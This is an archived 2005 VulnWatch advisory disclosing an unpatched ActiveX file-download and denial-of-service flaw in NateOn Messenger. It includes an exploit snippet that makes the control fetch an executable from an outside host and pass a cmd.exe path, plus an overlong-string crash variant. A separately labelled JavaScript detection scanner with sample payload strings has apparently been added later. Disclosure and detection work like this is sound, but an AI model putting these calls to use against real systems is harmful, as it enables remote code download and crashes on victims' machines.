[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS

From: saintlinu (saintlinu@private)
Date: Wed Sep 28 2005 - 20:36:27 PDT


Title:             Arbitrary File Download by NateOn Messenger's ActiveX and DoS

Discoverer:        PARK, GYU TAE (saintlinu@private)

Advisory No.:      NRVA05-08

Critical:          Moderately Critical

Impact:            Arbitrary file download by NateOn Messenger's ActiveX and DoS

Where:             From remote

Operating System:  Windows Only

Solution:          Not yet patched

Workaround:        N / A

Notice:            09. 17. 2005 Initial notification

                   09. 23. 2005 2nd notification

                   09. 27. 2005 3rd notification

                   09. 29. 2005 Vendor did not respond. Vulnerability disclosed

Description:

NateOn Messenger (see NRVA05-02) is an Internet instant messenger, like MSN, Yahoo and so on.

If NateOn Messenger is installed, it can be exploited through its 'NateonDownloadManager.ocx' ActiveX control. There is also another vulnerability, a buffer overflow.

Details follow. The full code is not included here, only a piece of it:

 

<--snip-->

             i = GotNate.IsNateonInstall();

             if( i == 1 ) {
                           alert('NateOn Messenger already installed. Do Attack ...');

                           // if you want a second-order attack, then try
                           i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');

                           // if you want to crash the victim's system, then try
                           i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
             } else {
                           alert('NateOn Messenger NOT Installed');
             }

</--snip-->
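
For a content filter or page review, the calls shown in the snippet can be matched in script source. The following is an added example, not code from the advisory or the vendor: the function names, the rule names, the 260-character threshold and the example.test URLs are assumptions, and the advisory does not document what each Excute argument means, so the rules key only on the argument shapes it shows.

```javascript
// Added example, not from the advisory. Heuristic: arguments passed as
// variables are seen only as identifiers, never evaluated.
const MAX_ARG_LEN = 260; // assumption (Windows MAX_PATH); the advisory gives no length

// Split a call's argument text on top-level commas, honouring quoted strings.
function splitArgs(text) {
  const args = [];
  let cur = '', quote = null;
  for (let i = 0; i < text.length; i++) {
    const c = text[i];
    if (quote) {
      if (c === '\\') { cur += text[++i] ?? ''; }   // keep only the escaped character
      else if (c === quote) { quote = null; }
      else { cur += c; }
    } else if (c === '"' || c === "'") { quote = c; }
    else if (c === ',') { args.push(cur.trim()); cur = ''; }
    else if (c === ')') { break; }
    else { cur += c; }
  }
  args.push(cur.trim());
  return args;
}

// Return one finding per suspicious use of the control's methods in `source`.
function scanScript(source) {
  const findings = [];
  if (/\.IsNateonInstall\s*\(/.test(source)) findings.push({ rule: 'install-probe' });
  const call = /\.Excute\s*\(/g;
  while (call.exec(source) !== null) {
    const args = splitArgs(source.slice(call.lastIndex));
    const [, url = '', third = ''] = args;
    if (/^https?:\/\//i.test(url) && /^[a-z]:\\/i.test(third)) {
      findings.push({ rule: 'remote-url-with-local-path', url, path: third });
    }
    const longest = Math.max(...args.map((a) => a.length));
    if (longest > MAX_ARG_LEN) findings.push({ rule: 'overlong-argument', length: longest });
  }
  return findings;
}

// Constructed sample input: page script as it would appear in HTML source.
const sample = [
  'if (GotNate.IsNateonInstall() == 1) {',
  "  GotNate.Excute(\"1\", 'http://example.test/a.exe', 'c:\\\\windows\\\\system32\\\\cmd.exe');",
  "  GotNate.Excute(\"1\", 'http://example.test/a.exe', '" + 'A'.repeat(1000) + "');",
  '}',
].join('\n');

console.log(scanScript(sample));
```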





	

	
		



This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT